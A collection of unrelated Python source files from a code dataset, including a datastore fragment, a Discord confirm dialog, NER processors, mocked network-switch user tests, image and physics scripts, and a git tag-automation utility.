results.setdefault(attribute, []) # If we are always after the latest ts we clear older ones. if (results_list and timestamp == self.NEWEST_TIMESTAMP and results_list[0][1] < ts): results_list = [] results[attribute] = results_list # Timestamp outside the range, drop it. elif ts < start or ts > end: continue value = self._value_converter.Decode(attribute, encoded_value) results_list.append((attribute, ts, value)) # Return the results in the same order they requested. remaining_limit = limit for attribute in attributes: # This returns triples of (attribute_name, timestamp, data). We want to # sort by timestamp. for _, ts, data in sorted( results.get(attribute, []), key=lambda x: x[1], reverse=True): if remaining_limit: remaining_limit -= 1 if remaining_limit == 0: yield (attribute, data, ts) return yield (attribute, data, ts) @utils.Synchronized def MultiResolvePrefix(self, subjects, attribute_prefix, timestamp=None, limit=None): unicode_to_orig = {utils.SmartUnicode(s): s for s in subjects} result = {} for unicode_subject, orig_subject in iteritems(unicode_to_orig): values = self.ResolvePrefix( unicode_subject, attribute_prefix, timestamp=timestamp, limit=limit) if not values: continue if limit: if limit < len(values): values = values[:limit] result[orig_subject] = values limit -= len(values) if limit <= 0: return iteritems(result) else: result[orig_subject] = values return iteritems(result) def Flush(self): pass @utils.Synchronized def ResolvePrefix(self, subject, attribute_prefix, timestamp=None, limit=None): """Resolve all attributes for a subject starting with a prefix.""" subject = utils.SmartUnicode(subject) if timestamp in [None, self.NEWEST_TIMESTAMP, self.ALL_TIMESTAMPS]: start, end = 0, (2**63) - 1 # Does timestamp represent a range? elif isinstance(timestamp, (list, tuple)): start, end = timestamp # pylint: disable=unpacking-non-sequence else: raise ValueError("Invalid timestamp: %s" % timestamp) start = int(start) end = int(end) if isinstance(attribute_prefix, str): attribute_prefix = [attribute_prefix] try: record = self.subjects[subject] except KeyError: return [] # Holds all the attributes which matched. Keys are attribute names, values # are lists of timestamped data. results = {} nr_results = 0 for prefix in attribute_prefix: for attribute, values in iteritems(record): if limit and nr_results >= limit: break if utils.SmartStr(attribute).startswith(prefix): for encoded_value, ts in values: results_list = results.setdefault(attribute, []) # If we are always after the latest ts we clear older ones. if (results_list and timestamp in [self.NEWEST_TIMESTAMP, None] and results_list[0][1] < ts): results_list = [] results[attribute] = results_list # Timestamp outside the range, drop it. elif ts < start or ts > end: continue value = self._value_converter.Decode(attribute, encoded_value) results_list.append((attribute, ts, value)) nr_results += 1 if limit and nr_results >= limit: break result = [] for attribute_name, values in sorted(iteritems(results)): # Values are triples of (attribute_name, timestamp, data). We want to # sort by timestamp. for _, ts, data in sorted(values, key=lambda x: x[1], reverse=True): # Return triples (attribute_name, data, timestamp). result.append((attribute_name, data, ts)) return result def Size(self): total_size = sys.getsizeof(self.subjects) for subject, record in iteritems(self.subjects): total_size += sys.getsizeof(subject) total_size += sys.getsizeof(record) for attribute, values in iteritems(record): total_size += sys.getsizeof(attribute) total_size += sys.getsizeof(values) for value, timestamp in values: total_size += sys.getsizeof(value) total_size += sys.getsizeof(timestamp) return total_size def PrintSubjects(self, literal=None): for s in sorted(self.subjects): if literal and literal not in s: continue print(s)
StarcoderdataPython
1766927
<filename>src/ext/confirmer.py import discord class ConfirmerSession: """Class that interactively paginates a set of embed using reactions.""" def __init__(self, page, color=discord.Color.green(), footer=''): """Confirmer, for confirming things obv duh.""" super().__init__() self.page = page # the list of embeds list[discord.Embed, discord.Embed] async def run(self, message): """Asks the user a question to confirm something.""" # We create the view and assign it to a variable so we can wait for it later. view = Confirm() message = await message.edit(embed=self.page, view=view) # Wait for the View to stop listening for input... await view.wait() message = await message.edit(embed=self.page, view=view) if view.value is None: return False, message elif view.value: return True, message else: return False, message # Define a simple View that gives us a confirmation menu class Confirm(discord.ui.View): def __init__(self): super().__init__() self.value = None # This one is similar to the confirmation button except sets the inner value to `False` @discord.ui.button(label="Cancel", style=discord.ButtonStyle.red) async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction): self.value = False self.stop() self.remove_item(self.children[0]) self.remove_item(self.children[0]) # When the confirm button is pressed, set the inner value to `True` and # stop the View from listening to more input. # We also send the user an ephemeral message that we're confirming their choice. @discord.ui.button(label="Confirm", style=discord.ButtonStyle.green) async def confirm(self, button: discord.ui.Button, interaction: discord.Interaction): self.value = True self.stop() self.remove_item(self.children[0]) self.remove_item(self.children[0])
StarcoderdataPython
1654458
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Author: <NAME> # Description: # mrc_ner_data_processor.py import os from mrc_utils import read_mrc_ner_examples class QueryNERProcessor(object): # processor for the query-based ner dataset def get_examples(self, data_dir, data_sign): data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner."+data_sign)) return data # def get_train_examples(self, data_dir): # data = read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.train")) # return data # def get_dev_examples(self, data_dir): # return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.dev")) # def get_test_examples(self, data_dir): # return read_mrc_ner_examples(os.path.join(data_dir, "mrc-ner.test")) class Conll03Processor(QueryNERProcessor): def get_labels(self, ): return ["ORG", "PER", "LOC", "MISC", "O"] class MSRAProcessor(QueryNERProcessor): def get_labels(self, ): return ["NS", "NR", "NT", "O"] class Onto4ZhProcessor(QueryNERProcessor): def get_labels(self, ): return ["LOC", "PER", "GPE", "ORG", "O"] class Onto5EngProcessor(QueryNERProcessor): def get_labels(self, ): return ['ORDINAL', 'CARDINAL', 'LOC', 'WORK_OF_ART', 'LANGUAGE', 'ORG', 'FAC', 'PERSON', 'EVENT', 'TIME', 'LAW', 'NORP', 'PERCENT', 'DATE', 'GPE', 'QUANTITY', 'PRODUCT', 'MONEY', 'O'] class ResumeZhProcessor(QueryNERProcessor): def get_labels(self, ): return ["ORG", "LOC", "NAME", "RACE", "TITLE", "EDU", "PRO", "CONT", "O"] class GeniaProcessor(QueryNERProcessor): def get_labels(self, ): return ['cell_line', 'cell_type', 'DNA', 'RNA', 'protein', "O"] class ACE2005Processor(QueryNERProcessor): def get_labels(self, ): return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"] class ACE2004Processor(QueryNERProcessor): def get_labels(self, ): return ["GPE", "ORG", "PER", "FAC", "VEH", "LOC", "WEA", "O"]
StarcoderdataPython
1646231
<reponame>mo-cmyk/wbgapi '''Access information about World Bank lending groups. This works best with the WDI (source=2) and other databases that share the same list of economies. It will probably not work well with subnational databases or region-specific ones. ''' import wbgapi as w from . import utils import builtins def list(id='all', q=None): '''Return a list of lending groups Arguments: id: a lending group identifier or list-like of identifiers q: search string (on lending group name) Returns: a generator object Example: lendingGroups = {row['id']: row['value'] for row in wbapi.lending.list()} Notes: The lending group list is global to the entire API and is not specific to the current database. ''' q,_ = utils.qget(q) for row in w.fetch('lendingtype/' + w.queryParam(id)): if utils.qmatch(q, row['value']): yield row def get(id): '''Retrieve the specified lending group Arguments: id: the lending group ID Returns: a lending group object Example: print(wbgapi.lending.get('IBD')['value']) ''' return w.get('lendingtype/' + w.queryParam(id)) def members(id): '''Return a set of economy identifiers that are members of the specified lending group Arguments: id: a lending group identifier Returns: a set object of economy identifiers Notes: the returned members may not match the economies in the current database since we access the universal region lists from the API ''' return w.region.members(id, 'lendingtype') def Series(id='all', q=None, name='LendingGroupName'): '''Return a pandas Series object by calling list ''' return w.Series(list(id, q=q), name=name) def info(id='all', q=None): '''Print a user report of lending groups Arguments: id: a lending group identifier or list-like of identifiers q: search string (on lending group name) Returns: None Notes: The lending group list is global to the entire API and is not specific to the current database. ''' return w.Featureset(list(id, q=q))
StarcoderdataPython
53115
import pytest from pynetworking.Device import Device def setup_dut(dut): dut.reset() dut.add_cmd({'cmd': 'show version', 'state': -1, 'action': 'PRINT', 'args': [""" AlliedWare Plus (TM) 5.4.2 09/25/13 12:57:26 Build name : x600-5.4.2-3.14.rel Build date : Wed Sep 25 12:57:26 NZST 2013 Build type : RELEASE """]}) def test_add_user(dut, log_level, use_mock): config_0 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password <PASSWORD> ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_1 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username testuser privilege 5 password 8 <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] setup_dut(dut) dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0}) dut.add_cmd({'cmd': 'username testuser privilege 5 password enemy', 'state': 0, 'action': 'SET_STATE', 'args': [1]}) dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1}) d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock) d.open() assert 'testuser' not in d.user.keys() d.user.create("testuser", password="<PASSWORD>", privilege_level=5) assert 'testuser' in d.user.keys() assert d.user['testuser']['privilege_level'] == '5' with pytest.raises(KeyError) as excinfo: d.user.create("", password="<PASSWORD>", privilege_level=5) assert 'user name cannot be empty' in excinfo.value with pytest.raises(KeyError) as excinfo: d.user.create("testuser", password="<PASSWORD>", privilege_level=5) assert 'user name {0} already exists'.format('testuser') in excinfo.value d.close() def test_change_user_password(dut, log_level, use_mock): config_0 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username testuser privilege 5 password 8 <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_1 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username testuser privilege 5 password 8 $<PASSWORD>HL/fM2F5<PASSWORD>c/54ZQ. ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_2 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username testuser privilege 5 password 8 <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] setup_dut(dut) dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0}) dut.add_cmd({'cmd': 'username testuser password <PASSWORD>', 'state': 0, 'action': 'SET_STATE', 'args': [1]}) dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1}) dut.add_cmd({'cmd': 'username testuser password enemy', 'state': 1, 'action': 'SET_STATE', 'args': [2]}) dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2}) d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock) d.open() old_pwd = d.user['testuser']['password'] d.user.update("testuser", password="<PASSWORD>") assert old_pwd != d.user['testuser']['password'] old_pwd = d.user['testuser']['password'] d.user.update("testuser", password="<PASSWORD>") assert old_pwd != d.user['testuser']['password'] old_pwd = d.user['testuser']['password'] d.user.update("testuser", password="<PASSWORD>") with pytest.raises(KeyError) as excinfo: d.user.update("") assert 'user name cannot be empty' in excinfo.value with pytest.raises(KeyError) as excinfo: d.user.update("xxxxxxxxxxxxxxxx", password="<PASSWORD>") assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value d.close() def test_change_user_privilege(dut, log_level, use_mock): config_0 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 $1$bJoVec4D$JwOJGPr7YqoExA0GVasdE0 username testuser privilege 5 password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_1 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 $1$<PASSWORD>$JwOJGPr7YqoExA0GVasdE0 username testuser password 8 $1$uWpWUKfS$l0FbezBRUBllEpc8.9kIF/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_2 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password <PASSWORD> username testuser privilege 5 password <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] setup_dut(dut) dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0}) dut.add_cmd({'cmd': 'username testuser privilege 1', 'state': 0, 'action': 'SET_STATE', 'args': [1]}) dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1}) dut.add_cmd({'cmd': 'username testuser privilege 5', 'state': 1, 'action': 'SET_STATE', 'args': [2]}) dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2}) d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock) d.open() assert d.user['testuser']['privilege_level'] == '5' d.user.update("testuser", privilege_level=1) assert d.user['testuser']['privilege_level'] == '1' d.user.update("testuser", privilege_level=5) assert d.user['testuser']['privilege_level'] == '5' d.close() def test_remove_user(dut, log_level, use_mock): config_0 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password <PASSWORD> username testuser privilege 5 password <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_1 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password <PASSWORD> ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] setup_dut(dut) dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0}) dut.add_cmd({'cmd': 'no username testuser', 'state': 0, 'action': 'SET_STATE', 'args': [1]}) dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1}) d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock) d.open() d.user.delete("testuser") with pytest.raises(KeyError): d.user['testuser'] d.close() def test_encrypted_password(dut, log_level, use_mock): config_0 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password <PASSWORD> ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_1 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username encuser privilege 10 password <PASSWORD>/ ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_2 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> username encuser privilege 10 password 8 $1$CE<PASSWORD>$3JfHL/fM2F5YS47c/54ZQ. ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] config_3 = [""" ! service password-encryption ! no banner motd ! username manager privilege 15 password 8 <PASSWORD> ! ssh server allow-users manager service ssh ! interface port1.0.1-1.0.50 switchport switchport mode access ! interface vlan1 ip address 10.17.39.253/24 ! end """] # Regular expressions are used. In emulated mode, if the password contains metacharacters like: . ^ $ * + ? { [ ] \ | ( ) # prepone them a \ character, otherwise they won't match. Follow the example here below. enc_pwd_1 = <PASSWORD>/' enc_pwd_2 = <PASSWORD>.' re_enc_pwd_1 = <PASSWORD>/' re_enc_pwd_2 = '\<PASSWORD>\.' setup_dut(dut) dut.add_cmd({'cmd': 'show running-config', 'state': 0, 'action': 'PRINT', 'args': config_0}) dut.add_cmd({'cmd': 'username\s+encuser\s+privilege\s+10\s+password\s+8\s+' + re_enc_pwd_1, 'state': 0, 'action': 'SET_STATE', 'args': [1]}) dut.add_cmd({'cmd': 'show running-config', 'state': 1, 'action': 'PRINT', 'args': config_1}) dut.add_cmd({'cmd': 'username\s+encuser\s+password\s+8\s+' + re_enc_pwd_2, 'state': 1, 'action': 'SET_STATE', 'args': [2]}) dut.add_cmd({'cmd': 'show running-config', 'state': 2, 'action': 'PRINT', 'args': config_2}) dut.add_cmd({'cmd': 'no username encuser', 'state': 2, 'action': 'SET_STATE', 'args': [3]}) dut.add_cmd({'cmd': 'show running-config', 'state': 3, 'action': 'PRINT', 'args': config_3}) d = Device(host=dut.host, port=dut.port, protocol=dut.protocol, log_level=log_level, mock=use_mock) d.open() assert 'encuser' not in d.user.keys() d.user.create("encuser", password=<PASSWORD>, privilege_level=10, encrypted=True) assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items() d.user.update("encuser", password=<PASSWORD>, encrypted=True) assert ('encuser', {'password': <PASSWORD>, 'privilege_level': '10'}) in d.user.items() d.user.delete("encuser") with pytest.raises(KeyError): d.user['encuser'] with pytest.raises(KeyError) as excinfo: d.user.delete("") assert 'user name cannot be empty' in excinfo.value with pytest.raises(KeyError) as excinfo: d.user.delete("xxxxxxxxxxxxxxxx") assert 'user name xxxxxxxxxxxxxxxx does not exist' in excinfo.value d.close()
StarcoderdataPython
3388685
<reponame>sinahmr/parted-vae import json import torch from partedvae.models import VAE def load(path, img_size, disc_priors, device): path_to_specs = path + 'specs.json' path_to_model = path + 'model.pt' with open(path_to_specs) as specs_file: specs = json.load(specs_file) latent_spec = specs["latent_spec"] model = VAE(img_size=img_size, latent_spec=latent_spec, c_priors=disc_priors, device=device) model.load_state_dict(torch.load(path_to_model, map_location=lambda storage, loc: storage)) return model
StarcoderdataPython
195721
import os import numpy as np import cv2 import csv import utils output_dir = "./multipleBackgroundsCorners" if (not os.path.isdir(output_dir)): os.mkdir(output_dir) dir = "../data1" import csv with open(output_dir+"/gt.csv", 'a') as csvfile: spamwriter_1 = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) for image in os.listdir(dir): if image.endswith("jpg"): if os.path.isfile(dir+"/"+image+".csv"): with open(dir+"/"+image+ ".csv", 'r') as csvfile: spamwriter = csv.reader(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL) img = cv2.imread(dir +"/"+ image) print image gt= [] for row in spamwriter: gt.append(row) # img = cv2.circle(img, (int(float(row[0])), int(float(row[1]))), 2,(255,0,0),90) gt =np.array(gt).astype(np.float32) # print gt gt = gt / (img.shape[1], img.shape[0]) gt = gt * (1080, 1080) img = cv2.resize(img, ( 1080,1080)) # for a in range(0,4): # img = cv2.circle(img, tuple((gt[a].astype(int))), 2, (255, 0, 0), 9) # cv2.imwrite("asda.jpg", img) # 0/0 for angle in range(0,271,90): img_rotate, gt_rotate = utils.rotate(img, gt,angle) for random_crop in range(0,1): img_list, gt_list = utils.getCorners(img_rotate, gt_rotate) for a in range(0,4): cv2.circle(img_list[a], tuple(gt_list[a]), 2,(255,0,0),2) cv2.imwrite( output_dir+"/"+image + str(angle) +str(random_crop) + str(a) +".jpg", img_list[a]) spamwriter_1.writerow(( image + str(angle) +str(random_crop) + str(a) +".jpg", tuple(gt_list[a])))
StarcoderdataPython
1668209
<reponame>adrienbrunet/mixt # coding: mixt """Ensure that the space before the ``/`` character is not mandatory""" from mixt import html from mixt.element import Element def test_normal_tag_without_props(): assert str(<button />) == '<button></button>' assert str(<button/>) == '<button></button>' def test_normal_tag_with_props(): assert str(<button name="foo" />) == '<button name="foo"></button>' assert str(<button name="foo"/>) == '<button name="foo"></button>' def test_nochild_tag_without_props(): assert str(<link />) == '<link />' assert str(<link/>) == '<link />' def test_nochild_tag_with_props(): assert str(<link rel="foo" />) == '<link rel="foo" />' assert str(<link rel="foo"/>) == '<link rel="foo" />' def test_new_element_without_props(): class Foo(Element): def render(self, context): return <div data-name="foo"/> assert str(<Foo />) == '<div data-name="foo"></div>' assert str(<Foo/>) == '<div data-name="foo"></div>' def test_new_element_with_props(): class Foo(Element): class PropTypes: name: str def render(self, context): return <div data-name="{self.name}"/> assert str(<Foo name="foo" />) == '<div data-name="foo"></div>' assert str(<Foo name="foo"/>) == '<div data-name="foo"></div>' def test_with_python_value_at_the_end(): assert str(<button name={"foo"} />) == '<button name="foo"></button>' assert str(<button name={"foo"}/>) == '<button name="foo"></button>' assert str(<button name={"foo"} ></button>) == '<button name="foo"></button>' assert str(<button name={"foo"}></button>) == '<button name="foo"></button>' def test_with_python_kwargs_at_the_end(): kwargs = {'name': 'foo'} assert str(<button {**kwargs} />) == '<button name="foo"></button>' assert str(<button {**kwargs}/>) == '<button name="foo"></button>' assert str(<button {**kwargs} ></button>) == '<button name="foo"></button>' assert str(<button {**kwargs}></button>) == '<button name="foo"></button>'
StarcoderdataPython
138331
<gh_stars>0 import random import numpy as np import pandas as pd import tqdm as tqdm import matplotlib.pyplot as plt # Initialize and create dataframe headers = ['Particle_X', 'Particle_Y', 'q1', 'q2', 'q3', 'q4', 'q5', 'q6', 'Velocity_X', 'Velocity_Y'] dataset = pd.DataFrame(columns=headers) # Physical Dimensions of 2D Hele-Shaw Cell H = 1 w = 1 particle = 1 velocity = [] n = 6 # X represents the position of the particle (must be within the boundary) x = [] class Point: def __init__(self, x, y): self.x = x self.y = y def __str__(self): return str((self.x, self.y)) class Circle: def __init__(self, origin, radius): self.origin = origin self.radius = radius origin = Point(0, 0) radius = w circle = Circle(origin, radius) for i in range(particle): p = random.random() * 2 * np.pi r = circle.radius * np.sqrt(random.random()) x.append([r * np.cos(p), r * np.sin(p)]) ParticleLocation = np.array(x) # Q represents the vector that contains elements that represent the point flow rate values # Summation of all Q must be = 0 to satisfy mass conservation Q = [] for i in range(n-1): Q.append(random.uniform(-1.0, 1.0)) Q.append(0-sum(Q)) # R represents the vector that contains elements that represent the coordinates of the ith source/sink R = [] # Plotting the Circle and its inlets/outlets # theta = np.linspace(0, 2 * np.pi, 100) r = np.sqrt(1.0) x1 = w * np.cos(theta) x2 = w * np.sin(theta) fig, ax = plt.subplots(1) ax.plot(x1, x2) ax.set_aspect(1) plt.xlim(-1.25 * w, 1.25 * w) plt.ylim(-1.25 * w, 1.25 * w) plt.grid(linestyle='--') plt.title('2D Hele-Shaw Point Source Model', fontsize=8) plt.savefig("plot_circle_matplotlib_01.png", bbox_inches='tight') # Determines the coordinates of the point sources/sinks based on number of inlet/outlet defined by n for i in range(n): R_coordinates = [w * np.cos(2 * (i - 1.0) * np.pi / n), w * np.sin(2 * (i - 1.0) * np.pi / n)] R.append(R_coordinates) PointSource = np.array(R) for n, txt in enumerate(Q): ax.annotate('{:.3f}'.format(txt), (R[n])) plt.scatter(*zip(*x)) plt.scatter(*zip(*R)) plt.show() # Given the defined inlet/outlets, the velocity of the particle for i in range(n): velocity.append( Q[i] * (ParticleLocation - (R[i])) / (np.linalg.norm((ParticleLocation - (R[i]))))**2) # Prints numerical results (for testing) print("The randomized particle location, X : ") print(ParticleLocation) print("The randomized inlet and outlet flowrates Q : ") print(np.array(Q)) print("The locations of the inlet/outlet : ") print(PointSource) print("The velocity of the particle : ") print((sum(velocity)))
StarcoderdataPython
1619419
#!/usr/bin/env python """ This is a script to automatically tag repos on GitHub. Sample usage: * To create a tag: $ python tagz.py -r mozilla/fireplace -c create -t 2014.02.11 NOTE: annotated tags are used by default (-a). If you want lightweight tags, you can pass -l: $ python tagz.py -l -r mozilla/fireplace -c create -t 2014.02.11 ALSO: this script will use whatever type of tag the first found refname is. You cannot use this script to mix use of the two in the same repo. * To create multiple tags: $ python tagz.py -r mozilla/zamboni,mozilla/fireplace -c create -t 2014.02.11 * To delete a tag: $ python tagz.py -r mozilla/fireplace -c delete -t 2014.02.11 * To cherry-pick a commit onto a tag: $ python tagz.py -r mozilla/fireplace -c cherrypick -t 2014.02.11 -s b4dc0ffee * To remove a commit from a tag: $ python tagz.py -r mozilla/fireplace -c revert -t 2014.02.11 -s b4dc0ffee """ import datetime import os import platform import subprocess import argparse GIT_ROOT_PATH = '/tmp/' VERBOSE = False DRYRUN = False def _open_pipe(cmd, cwd=None): return subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd) def get_team_repo(remote_url): """ Takes remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`) and returns team/repo pair (e.g., `mozilla/fireplace`). """ if ':' not in remote_url: return remote_url return remote_url.split(':')[1].replace('.git', '') def get_remote_url(remote_url): """ Takes a GitHub remote URL (e.g., `mozilla/fireplace`) and returns full remote URL (e.g., `<EMAIL>:mozilla/fireplace.git`). """ if ':' not in remote_url: remote_url = '<EMAIL>:' + remote_url if not remote_url.endswith('.git'): remote_url += '.git' return remote_url def get_git_path(remote_url): repo = ''.join(x for x in get_team_repo(remote_url) if x.isalnum() or x == '/') dir_name = os.path.join(GIT_ROOT_PATH, repo.replace('/', '__')) if not os.path.exists(dir_name): os.makedirs(dir_name) git(dir_name, 'clone {remote_url} {dir_name}'.format(remote_url=remote_url, dir_name=dir_name)) return dir_name def get_github_url(team, repo, url=''): return 'https://github.com/{team}/{repo}{url}'.format( team=team, repo=repo, url=url) def git(path, args, limit=None): if DRYRUN: print 'cd %s; git %s' % (path, args) return '' if limit: stdout, stderr = _open_pipe(['git'] + args.split(' ', limit), cwd=path).communicate() else: stdout, stderr = _open_pipe(['git'] + args.split(' '), cwd=path).communicate() if VERBOSE and stderr: print stderr return stderr or stdout def git_create_tag(path, tag, annotated): # Create new tag. Assumes tag has no spaces. if annotated: git(path, 'tag -a %s -m tag for %s' % (tag, tag), 4) else: git(path, 'tag %s' % tag) # Push tag. git(path, 'push --tags') def git_delete_tag(path, tag): # Delete tag. git(path, 'tag -d %s' % tag) # Delete remote tag. git(path, 'push origin :%s' % tag) def pbcopy(data): """Copy to clipboard on Mac OS X/Linux.""" mac, linux = False, False if os.name == 'mac' or platform.system() == 'Darwin': mac = True elif os.name == 'posix' or platform.system() == 'Linux': linux = True else: return if mac: pb = _open_pipe(['pbcopy']) elif linux: pb = _open_pipe(['xsel', '--clipboard', '--input']) pb.stdin.write(data) pb.stdin.close() return pb.wait() def resolve_annotate(path, use_annotate): """Be internally consistent with tag type.""" retval = use_annotate first_tag = (git(path, 'for-each-ref refs/tags --sort=refname --count=1 ' '--format="%(taggerdate:raw)|%(refname:strip=2)"') .strip(' \n') .replace('"', '') .split('|')) if len(first_tag) > 1: if ((use_annotate and first_tag[0] == '') or (not use_annotate and first_tag[0] != '')): retval = not use_annotate return retval def main(): global VERBOSE, DRYRUN p = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) p.add_argument('-c', '--command', dest='cmd', action='store', choices=['cherrypick', 'create', 'delete', 'revert'], help='command to run') p.add_argument('-r', '--repo', dest='repo', action='store', default='', help='remote repository URL (e.g., ' '`[email protected]:mozilla/fireplace.git` or ' '`mozilla/fireplace`)', required=True) p.add_argument('-s', '--sha', dest='sha', action='store', help='sha1 hash of git commit') p.add_argument('-t', '--tag', dest='tag', action='store', help='name of git tag', required=True) p.add_argument('-v', '--verbose', dest='verbose', action='store', help='make lots of noise', default=VERBOSE) p.add_argument('-n', '--dry-run', dest='dryrun', action='store', help="Show git actions to perform but don't do them", default=DRYRUN) group = p.add_mutually_exclusive_group(required=False) group.add_argument('-a', '--annotate', dest='useannotate', action='store_true') group.add_argument('-l', '--lightweight', dest='useannotate', action='store_false') p.set_defaults(useannotate=True) args = p.parse_args() cmd, repo, sha, tag = (args.cmd, args.repo, args.sha, args.tag) VERBOSE, DRYRUN, use_annotated = (args.verbose, args.dryrun, args.useannotate) if tag == 'YYYY.MM.DD': p.error('tag should be the date of push, not: %s' % tag) try: tagdate = datetime.datetime.strptime(tag, '%Y.%m.%d') if tagdate.weekday() == 4: p.error('%s is a Friday. Did you really mean %s?' % (tag, (tagdate + datetime.timedelta(days=4) ).strftime('%Y.%m.%d'))) except ValueError: # Not parseable as a date, no big deal. pass if cmd in ('cherrypick', 'revert') and not sha: p.error( 'argument -s/--sha is required is when cherry-picking a commit') repos = [get_remote_url(x.strip()) for x in repo.split(',')] urls = [] for remote_url in repos: path = get_git_path(remote_url) team, repo = get_team_repo(remote_url).split('/') # Check out master. git(path, 'checkout master') # Fetch the latest tags and code. git(path, 'fetch --tags') git(path, 'pull --rebase') set_annotate = resolve_annotate(path, use_annotated) if set_annotate != use_annotated: if set_annotate: print 'Convention is to use annotated tags. Conforming...' else: print 'Convention is to use lightweight tags. Conforming...' if cmd == 'create': git_create_tag(path, tag, set_annotate) elif cmd == 'cherrypick': # Check out existing tag. git(path, 'checkout %s' % tag) git_delete_tag(path, tag) # Cherry-pick commit. git(path, 'cherry-pick %s' % sha) git_create_tag(path, tag, set_annotate) elif cmd == 'delete': git_delete_tag(path, tag) elif cmd == 'revert': # Check out existing tag. git(path, 'checkout %s' % tag) git_delete_tag(path, tag) # Revert commit. git(path, 'revert %s' % sha) git_create_tag(path, tag, set_annotate) # Identify the latest two tags. # This will only work if a repo: # a) contains strictly lightweight OR annotated tags # b) has a defined tag syntax, e.g. /YYYY\.MM\.DD(-\d)?/ # c) only tags in linear sequence # Because lightweight tags point to commits and annotated # tags are explicit objects, you can't rely on dereferencing # fields between the two for comparisons. # Meaning, something like this: # git for-each-ref --format='%(*committerdate:raw)%(committerdate:raw) %(refname) \ # %(*objectname) %(objectname)' refs/tags | sort -n -r | awk '{ print $3; }' | head -2 # won't work because the %(committerdate) field is unreliable # as a timeline sequence between lightweight and annotated tags. # Which is why "latest" tags assume that tags are not # applied to points in a branch prior to another tag. # Be internally consistent: formatstring = 'for-each-ref refs/tags --format="%(refname:strip=2)" --count=2 ' if set_annotate: formatstring += '--sort=-refname --sort=-*committerdate' else: formatstring += '--sort=-refname --sort=-committerdate' 